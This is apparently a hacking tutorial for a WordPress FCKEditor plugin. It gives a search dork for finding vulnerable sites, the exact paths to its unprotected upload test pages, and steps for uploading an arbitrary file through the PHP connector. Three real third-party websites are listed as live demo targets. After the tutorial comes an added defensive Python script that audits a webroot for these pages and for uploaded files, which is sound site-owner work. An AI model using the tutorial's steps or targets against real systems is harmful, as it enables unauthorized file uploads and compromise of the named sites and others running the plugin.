Assalamualaikum and greetings. Today I want to share a new tutorial with you: the WP FCKEditor exploit!
OK, let's go~
1. Start by searching with this dork:
inurl:"plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/"
2. Pick one of the websites and append one of the exploit paths below to the end of the URL.
Exploit:
/wp-content/plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/fckeditor/editor/filemanager/connectors/uploadtest.html
or
/wp-content/plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/filemanager/connectors/test.html
3. Next, change the connector from asp to php and choose your file. Then UPLOAD!
4. To see the result:
http://[target].com/UserFiles/filekorang.txt
DONE!
Live demo :
http://cougardating.datingease.com/wp-content/plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/fckeditor/editor/filemanager/upload/test.html
http://www.cereuswomen.com/podcast/wp-content/plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/filemanager/connectors/uploadtest.html
https://scandlearn.com/iphonebeta/wp-content/plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/fckeditor/editor/filemanager/connectors/test.html
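For site owners, an added example (not part of the original post) that audits a local copy of a webroot for the upload test pages named in the paths above and lists whatever sits in the `UserFiles` upload directory. The function names, the script name and the sample tree are assumptions made for this example; only the plugin directory, the test page names and `UserFiles` come from the post.

```python
import os
import sys
import tempfile

# Names taken from the paths in the post above.
PLUGIN_DIR = "deans-fckeditor-with-pwwangs-code-plugin-for-wordpress"
TEST_PAGES = {"test.html", "uploadtest.html"}
UPLOAD_DIR = "UserFiles"


def audit_webroot(webroot):
    """Return (exposed_test_pages, uploaded_files), paths relative to webroot."""
    exposed, uploaded = [], []
    for dirpath, _dirs, filenames in os.walk(webroot):
        rel_dir = os.path.relpath(dirpath, webroot)
        parts = rel_dir.split(os.sep)
        for name in filenames:
            rel = os.path.normpath(os.path.join(rel_dir, name)).replace(os.sep, "/")
            in_filemanager = PLUGIN_DIR in parts and "filemanager" in parts
            if in_filemanager and name.lower() in TEST_PAGES:
                exposed.append(rel)      # upload test page present under the plugin
            elif UPLOAD_DIR in parts:
                uploaded.append(rel)     # file sitting in the upload destination
    return sorted(exposed), sorted(uploaded)


def build_sample_tree(root):
    """Create a constructed sample webroot (not real data) for the demo run."""
    base = f"wp-content/plugins/{PLUGIN_DIR}/fckeditor/editor"
    for rel in (f"{base}/filemanager/connectors/uploadtest.html",
                f"{base}/fckeditor.html",
                "UserFiles/filekorang.txt",
                "index.php"):
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        open(path, "w").close()


if __name__ == "__main__":
    # Usage: python audit.py /path/to/webroot  (no argument: run on the sample tree)
    root = sys.argv[1] if len(sys.argv) > 1 else tempfile.mkdtemp()
    if len(sys.argv) == 1:
        build_sample_tree(root)
    exposed, uploaded = audit_webroot(root)
    for rel in exposed:
        print("exposed upload test page:", rel)
    for rel in uploaded:
        print("file in upload directory:", rel)
```

Any path in the first list is an upload test page that should not be shipped on a production site; the second list is the set of files to review for content nobody on the team put there.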
That's all for now. Assalamualaikum~